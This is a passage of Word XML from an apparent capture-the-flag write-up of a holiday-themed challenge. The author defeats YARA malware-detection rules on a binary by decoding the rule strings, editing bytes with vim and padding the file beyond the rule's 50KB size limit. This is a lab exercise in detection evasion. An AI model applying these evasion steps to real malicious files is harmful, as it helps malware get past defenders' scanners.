      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD756E4" w14:textId="258209E4" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="001C2E9D">
      <w:r>
        <w:t>Now we receive a</w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t xml:space="preserve"> new</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49672D0C" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">snowball2@86cd63f0801e:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the_critical_elf_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1637FAA1" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">yara_rule_1056 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the_critical_elf_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C96C116" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">bash: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the_critical_elf_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7A5796" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767EF339" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>snowball2@86cd63f0801e:~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yara_rules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ grep yara_rule_1056 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rules.yar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F45DAD3" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>rule yara_rule_1056 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E8BA14" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   meta: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C375A9F" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        description = "binaries - file frosty.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329C58EF" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        author = "Sparkle Redberry"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330C9421" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        reference = "North Pole Malware Research Lab"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049B7E86" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        date = "1955-04-21"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51878F" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        hash = "b9b95f671e3d54318b3fd4db1ba3b813325fcef462070da163193d7acb5fcd03"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECA7196" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77744BE6" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $s1 = {6c 6962 632e 736f 2e36}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4390B08A" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $hs2 = {726f 6772 616d 2121}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D16CE2" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    condition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4AF046" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        all of them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF05C8F" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461BBD74" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="008609DD"/>
    <w:p w14:paraId="313FED5F" w14:textId="3A7B484E" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="008609DD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Converting these, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>6c 6962 632e 736f 2e36</w:t>
      </w:r>
      <w:r>
        <w:t>” is libc.so.6 and probably can’t be modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5775CEE5" w14:textId="0CD023AD" w:rsidR="001C2E9D" w:rsidRDefault="008609DD" w:rsidP="008609DD">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>726f 6772 616d 2121</w:t>
      </w:r>
      <w:r>
        <w:t>” is "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rogram</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">!!" and may be available for changing. The offending text appeared toward the top of the file around </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>candycane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and other suspect strings. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F55022" w14:textId="4CC9058E" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="008609DD">
      <w:r>
        <w:t xml:space="preserve">I repeated the activity with </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> above to swap the two ‘!’ to ‘x’ again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E7059B" w14:textId="1B775774" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="008609DD">
      <w:r>
        <w:t>Running the command fails with a third rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092589F7" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>snowball2@86cd63f0801e:~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yara_rules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ grep yara_rule_1732 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rules.yar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A8C18" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>rule yara_rule_1732 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4D3381" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   meta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBDE44F" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      description = "binaries - alwayz_winter.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC8A16" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      author = "Santa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A2A3B" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      reference = "North Pole Malware Research Lab"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B31B23" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      date = "1955-04-22"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6224D160" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      hash = "c1e31a539898aab18f483d9e7b3c698ea45799e78bddc919a7dbebb1b40193a8"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39812A8A" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B49C1BB" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s1 = "This is critical for the execution of this program!!" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4799F55B" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s2 = "__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frame_dummy_init_array_entry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78667667" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s3 = ".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>note.gnu.property</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD93F2A" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s4 = ".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eh_frame_hdr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6258D78B" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s5 = "__FRAME_END__" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551CC90" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s6 = "__GNU_EH_FRAME_HDR" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E21545B" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s7 = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frame_dummy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FADE8B2" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s8 = ".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>note.gnu.build</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-id" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC4D2FF" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s9 = "completed.8060" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DF74C6" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s10 = "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IO_stdin_used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318FBE9A" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s11 = ".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>note.ABI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-tag" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728FD848" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s12 = "naughty string" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13694728" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s13 = "dastardly string" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DB8CE4" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s14 = "__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>do_global_dtors_aux_fini_array_entry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B8EBFC" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s15 = "__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc_start_main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">@@GLIBC_2.2.5" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3641DE44" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s16 = "GLIBC_2.2.5" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F8A7A1" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s17 = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its_a_holly_jolly_variable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3943858F" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s18 = "__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cxa_finalize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E679005" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s19 = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HolidayHackChallenge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NotReallyAFlag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">}" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160CFE30" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s20 = "__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc_csu_init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fullword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B804059" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   condition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52313FB1" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      uint32(1) == 0x02464c45 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filesize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt; 50KB and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46654D54" w14:textId="77777777" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      10 of them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C62BD5B" w14:textId="3F2C1945" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2335189C" w14:textId="46FDEBC4" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="008609DD"/>
    <w:p w14:paraId="164AA8E7" w14:textId="16E8A3E3" w:rsidR="008609DD" w:rsidRDefault="008609DD" w:rsidP="008609DD">
      <w:r>
        <w:t>There are 20 strings represented, but I only felt 5 could likely be safely modified (1,12,13,17,19).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353A771C" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="008609DD" w:rsidP="008609DD">
      <w:r>
        <w:t xml:space="preserve">However, since this is an “and” condition, it might be easier to make one of the other checks fail. To solve this challenge, I added a bunch of junk data using the same technique we used to modify the file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366A0885" w14:textId="19515DAD" w:rsidR="00342C83" w:rsidRDefault="008609DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After adding enough junk to the file, it will exceed 50kb and will not be caught by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yara</w:t>
      </w:r>
